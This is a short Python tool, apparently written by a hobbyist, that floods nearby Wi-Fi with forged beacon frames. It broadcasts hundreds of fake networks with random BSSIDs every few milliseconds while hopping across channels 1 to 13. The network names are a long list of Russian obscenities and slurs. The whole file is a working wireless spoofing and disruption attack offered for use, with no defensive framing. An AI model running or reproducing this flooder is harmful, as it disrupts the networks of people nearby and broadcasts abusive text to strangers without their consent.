#!/usr/bin/env python3
import random
from misc import WiFiPhyManager
from test import PacketBuilder
import pcapy
import threading
import time
import signal

interrupt_flag = False

def handle_interrupt(signum, frame):
	global interrupt_flag
	interrupt_flag = True
	print('Interrupted')

signal.signal(signal.SIGINT, handle_interrupt)

interface = 'radio0mon'
broadcast = 'ff:ff:ff:ff:ff:ff'
channel = 6
SC = 0
pcap = pcapy.open_live(interface, 65535, 0, 0)
wifi = WiFiPhyManager()
#wifi_inject = WiFiInject(interface)
pb = PacketBuilder()

ssids = ['а поебаться?', 'сто хуёв', 'апчхуй', 'архипиздрит', 'ахуй', 'ахулиард', 'хуя тебе', 'без пизды', 'бля', 'блядво', 'блядёшка', 'блядина', 'блядища', 'блядки', 'блядовать', 'блядовитый', 'блядоёбина', 'блядский', 'блядство', 'блядствовать', 'блядун', 'блядь', 'блядькать', 'блядькнуть', 'бляха муха', 'босый хуй', 'голая пизда', 'был бы хуй', 'в ахуе', 'в два хуя', 'в душе не ебу', 'в еблет', 'в жопу ёбаный', 'в пизду', 'хуй', 'в рот ебаться', 'в хуй дует', 'в хуй дышит', 'в хуй', 'в хуй не дуть', 'в хуй не ставить', 'в хуй не уперся', 'веселоебучесть', 'веселоебучий', 'хуй в роте', 'хуй во рту', 'лапшу на хуй', 'взъёб', 'взъебать', 'взъёбка', 'взъебти', 'взъёбывать', 'влындить хуй', 'вола ебать', 'волоёб', 'волоёбство', 'вот и весь хуй', 'хуй в томате', 'хуй на абажуре', 'пизда торчком', 'вхуяриться', 'въёб', 'въебать', 'въебаться', 'въебашить', 'въебенить', 'въёбка', 'въёбывать', 'выблядок', 'выебанный', 'выебать', 'выебаться', 'выебина', 'выёбистый', 'выебнуть', 'выебнуться', 'выебон', 'выебонщик', 'выебсти', 'выебти', 'выёбывать', 'выёбываться', 'выеть', 'выпиздеться', 'выпиздить', 'гавкнуть пиздой', 'говно', 'головка от хуя', 'головотяп', 'голодная пизда', 'голохуевка', 'горит пизда', 'дать в еблетку', 'дать пизды', 'дать по ебалу', 'до пизды', 'до хуища', 'до хуя', 'довыёбываться', 'доёб', 'доебать', 'доебаться', 'доёбистый', 'доёбка', 'доебсти', 'доебти', 'доёбчивость', 'доёбчивый', 'доёбщик', 'доёбывать', 'доёбываться', 'долбоёб', 'долбоебизм', 'долбоёбина', 'долбоёбище', 'долбоёбский', 'долбоёбство', 'допиздеться', 'дохулион', 'дохуя', 'драпиздон', 'драпиздончик', 'дуроёб', 'дядеёб', 'ёб вашу мать', 'ёб иху мать', 'ёб твою мать', 'ёб твоя мать', 'ебабельность', 'ебабельный', 'ебак', 'ебака', 'Ебаков', 'ебал', 'ебала', 'ебалай', 'ебалайствовать', 'ёбалды', 'ебало', 'ебало завали!', 'ебало на ноль!', 'ебало офнуть', 'ебало сверни!', 'ебало свернуть', 'ебальная', 'ебальник', 'ебальничек', 'ебальный', 'ебальня', 'ебальце', 'ебан', 'ебанарий', 'ебанат', 'ебанатик', 'ебанашка', 'ебание', 'ебанизм', 'ебанина', 'ебанистика', 'ебанистический', 'ёбанный', 'ебано', 'ёбаногандонный', 'хуепедераст', 'ебаноид', 'ебанутость', 'ебанутый', 'ебануть', 'ебануть в бороду', 'ебануться', 'ебанушка', 'ебаный', 'ёбаный', 'ёбаный в жопу', 'ёбаный в рот', 'ёбаный насос', 'ёбаный покос', 'ёбаный стос', 'ёбаный стыд', 'ёбаный шашлык', 'ёбань', 'ебанье', 'хуй', 'пизда', 'ебать', 'блядь', 'пидор', 'мудак', 'жопа', 'манда', 'хуя', 'хую', 'хуем', 'хуёвый', 'охуительный', 'пизде', 'пиздёж', 'пизду', 'пиздюлина', 'пиздобол', 'опиздинеть', 'пиздых', 'подпёздывать', 'ебу', 'еби', 'ебут', 'ёбарь', 'поеботина', 'выебываться', 'долбоёб', 'мудоёбы', 'ёб твою мать', 'ёбнул', 'ёбнутый', 'бля', 'бляди', 'мудачок', 'жопу', 'жопы', 'жопе', 'манду', 'мандой', 'мандовошка', 'Ёбаный пылесос', 'Уебан', 'Сракоблядь', 'Прохуебина', 'Ебать-копать', 'Хуй не хуй']

encoded_ssids = [s.encode('utf-8') for s in ssids]
ssids_cnt = len(ssids)

def rnd_bssid():
	return ":".join(f"{random.randint(0x00, 0xFF):02x}" for _ in range(6))

bssid_pool = [rnd_bssid() for _ in range(ssids_cnt)]

def send_beacons():
	global SC
	i = 0
	while not interrupt_flag:
		if i > ssids_cnt -1:
			i = 0
		if SC >= 127:
			SC = 0

		essid = encoded_ssids[i]
		bssid = rnd_bssid()

		packet = \
			pb.RadioTap() + \
			pb.Dot11(0x80, 'ff:ff:ff:ff:ff:ff', bssid, bssid, frag=0, seq=SC) + \
			pb.Dot11Beacon(capabilities=0x00) + \
			pb.Dot11Elt(0, essid)

		pcap.sendpacket(packet)
		SC += 1
		
		print(f'[+] Sended beacon frame | BSSID: {bssid} | SSID="{ssids[i]}"')

		i += 1

		time.sleep(0.0050)

def channel_hopper():
	global channel
	while not interrupt_flag:
		if interrupt_flag:
			break
		# Знаю, по идиотски, но умнее лень было придумывать
		channel = random.choice([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13])
		wifi.switch_iface_channel(interface, channel)
		print(f'[~] Switching {interface} to channel {channel}')
		time.sleep(1)

#threading.Thread(target=send_beacons).start()
threading.Thread(target=channel_hopper).start()
send_beacons()